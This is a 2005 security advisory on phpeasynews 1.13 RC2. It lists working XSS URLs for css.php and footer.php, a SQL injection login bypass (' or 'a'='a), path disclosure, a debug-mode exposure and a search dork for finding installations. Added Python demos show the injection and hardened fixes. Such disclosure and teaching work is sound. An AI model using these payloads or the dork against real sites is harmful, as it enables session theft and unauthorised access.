Phpeasynews version 1.13 RC2 is susceptible to cross site scripting, path disclosure, and user check bypass vulnerabilities.
1bcd3c76f6565004ab00f136803cee930fa5730fb78ad311913b6ad2b14f5279
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-number">31/07/2005 00:17:53
phpeasynews v1.13 RC2 (possibly prior versions)
cross site scripting, path disclosure, user check bypass (sql injection), debug mode exposure
author site:
http://www.brettjenkins.co.uk/
xss (the following GET parameters are written to the page unescaped; in css.php the value lands inside the inline stylesheet, so the payload first closes the CSS rule with } and the HTML comment wrapper with -->, then the <style> element itself, and the trailing <!-- comments out the rest of the original output):
http://[target]/[path]/includes/css.php?css_tableheader=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_tablemain=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_na_writtenbyonat=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink_hover=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_version_number=<script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_website_url=<script>alert(document.cookie)</script><!--
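The two output contexts above, as an added example in Python that is not part of the advisory or of phpeasynews: the template strings, the .tableheader selector and the footer markup are assumptions inferred from the payloads (the "}-->" prefix implies the css_* value sits inside a CSS rule wrapped in an HTML comment), while the payloads themselves are copied from the advisory. It shows why one escaping routine does not fit both spots: in the footer, htmlspecialchars()-style escaping is enough; inside the stylesheet the value should be validated against a whitelist, because escaping alone would still leave the attacker in control of the CSS.

```python
import html
import re

# Payloads copied from the advisory above.
CSS_PAYLOAD = "}--></style><script>alert(document.cookie)</script><!--"
FOOTER_PAYLOAD = "<script>alert(document.cookie)</script><!--"

# Assumed templates (not phpeasynews source): the "}-->" prefix of the payload
# implies the css_* value sits inside a rule of an inline stylesheet that is
# wrapped in an HTML comment; the footer echoes its variables straight into HTML.
CSS_TEMPLATE = (
    '<style type="text/css">\n'
    '<!--\n'
    '.tableheader { %s }\n'
    '-->\n'
    '</style>\n'
)
FOOTER_TEMPLATE = '<p>Powered By: PHPeasynews %s</p>\n'

# Only plain declaration lists such as "color: #fff; font-weight: bold" pass.
# The character class excludes '}', '<', '>', '/' and '(' so a value can neither
# close the rule, nor the <style> element, nor call url()/expression().
CSS_DECLARATIONS = re.compile(r"^[\w\s#%,.:;-]*$")


def render_css_vulnerable(css_tableheader):
    """Unescaped echo of the variable, as the advisory describes."""
    return CSS_TEMPLATE % css_tableheader


def render_css_hardened(css_tableheader):
    """Validate instead of escape: HTML escaping would keep the value inside
    <style>, but would still let the attacker write arbitrary CSS."""
    if not CSS_DECLARATIONS.fullmatch(css_tableheader):
        raise ValueError("css_tableheader is not a plain CSS declaration list")
    return CSS_TEMPLATE % css_tableheader


def render_footer_vulnerable(pen_version_number):
    """Unescaped echo into the HTML body."""
    return FOOTER_TEMPLATE % pen_version_number


def render_footer_hardened(pen_version_number):
    """HTML body context: htmlspecialchars()-style escaping is sufficient
    (quote=True also covers an attribute context such as an href built
    from pen_website_url)."""
    return FOOTER_TEMPLATE % html.escape(pen_version_number, quote=True)


def leaves_style_element(rendered):
    """True when an attacker-supplied </style> precedes the template's own."""
    first = rendered.find("</style>")
    return first != -1 and first < rendered.rfind("</style>")


if __name__ == "__main__":
    print(render_css_vulnerable(CSS_PAYLOAD))      # script tag lands outside <style>
    print(render_footer_hardened(FOOTER_PAYLOAD))  # &lt;script&gt;... stays inert
```

The same breakout works for every css_* parameter listed above, since they all land in the same stylesheet context; only the selector differs.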
path disclosure:
submitting a single quote (') as the username on the login form breaks the SQL query, and the resulting database error message reveals the full filesystem path of the application
user check bypass (sql injection):
if magic_quotes_gpc is off, you can always pass the username check by logging in with username: ' or 'a'='a
(at line 114 we have:
$query = "SELECT * FROM $PEN_DB_TABLE3 WHERE username = '$submittedusername'";
which becomes:
SELECT * FROM pen_users WHERE username = '' or 'a'='a'
a condition that is always true, so the query returns every user instead of none;
with magic_quotes_gpc on the quote is escaped to \' and the injection fails)
the password, however, is still compared against the returned row, so the same trick does not work for the password field
as a consequence, one of the admin users, if such an account is created, can log in as an invisible user
named "'or 'a'='a"
or "'or isnull(1/0) or 'a'='a"
etc.
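The bypass in working code, as an added example that is not from the advisory or from phpeasynews: it rebuilds the query from line 114 against an in-memory SQLite table with constructed sample users, and assumes (since the advisory does not show it) that the password is compared in application code against the first returned row, using md5 hashes. The hardened lookup binds the username as a parameter instead. SQLite stands in for MySQL, so the isnull(1/0) variant and the effect of magic_quotes (backslash escaping, which SQLite does not interpret) are not reproduced.

```python
import hashlib
import sqlite3

# Constructed sample data, not taken from phpeasynews: two accounts in a table
# shaped like the advisory's pen_users, with md5 password hashes (an assumption
# about how the application stores passwords).
SAMPLE_USERS = [
    ("admin", hashlib.md5(b"s3cret").hexdigest()),
    ("editor", hashlib.md5(b"hunter2").hexdigest()),
]

# Username payload from the advisory.
INJECTION = "' or 'a'='a"


def make_db():
    """In-memory SQLite stand-in for the MySQL table (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pen_users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO pen_users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, submitted_username):
    """Mirrors the advisory's line 114: the raw username is spliced into the SQL text."""
    query = f"SELECT * FROM pen_users WHERE username = '{submitted_username}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, submitted_username):
    """Hardened form: a bound parameter, so a quote can never end the literal."""
    query = "SELECT * FROM pen_users WHERE username = ?"
    return conn.execute(query, (submitted_username,)).fetchall()


def login(conn, lookup, username, password):
    """Assumed login flow: fetch the user row, then compare the password hash in
    application code. Returns the authenticated username or None."""
    rows = lookup(conn, username)
    if not rows:
        return None
    # Assumption: the application reads only the first row of the result set.
    stored_name, stored_hash = rows[0]
    if hashlib.md5(password.encode()).hexdigest() != stored_hash:
        return None
    return stored_name


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, INJECTION))                  # both rows come back
    print(safe_lookup(db, INJECTION))                        # [] : no user has that literal name
    print(login(db, vulnerable_lookup, INJECTION, "s3cret"))  # 'admin' : first row's password
    print(login(db, vulnerable_lookup, INJECTION, "wrong"))   # None : password is still checked
```

The third and fourth calls are the point of the advisory's remark about the password: the injected username makes the WHERE clause match everyone, but the caller still has to know the password of whichever row is returned first.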
debug mode:
the SQL queries being executed are displayed whenever the $debug variable is set, which any visitor can do from the query string, for example:
http://[target]/[path]/admin.php?debug=1
googledork:
"Powered By: PHPeasynews"
author has been contacted
rgod
email: retrogod at aliceposta it
site: http://rgod.altervista.org
</span></span>
</code></pre>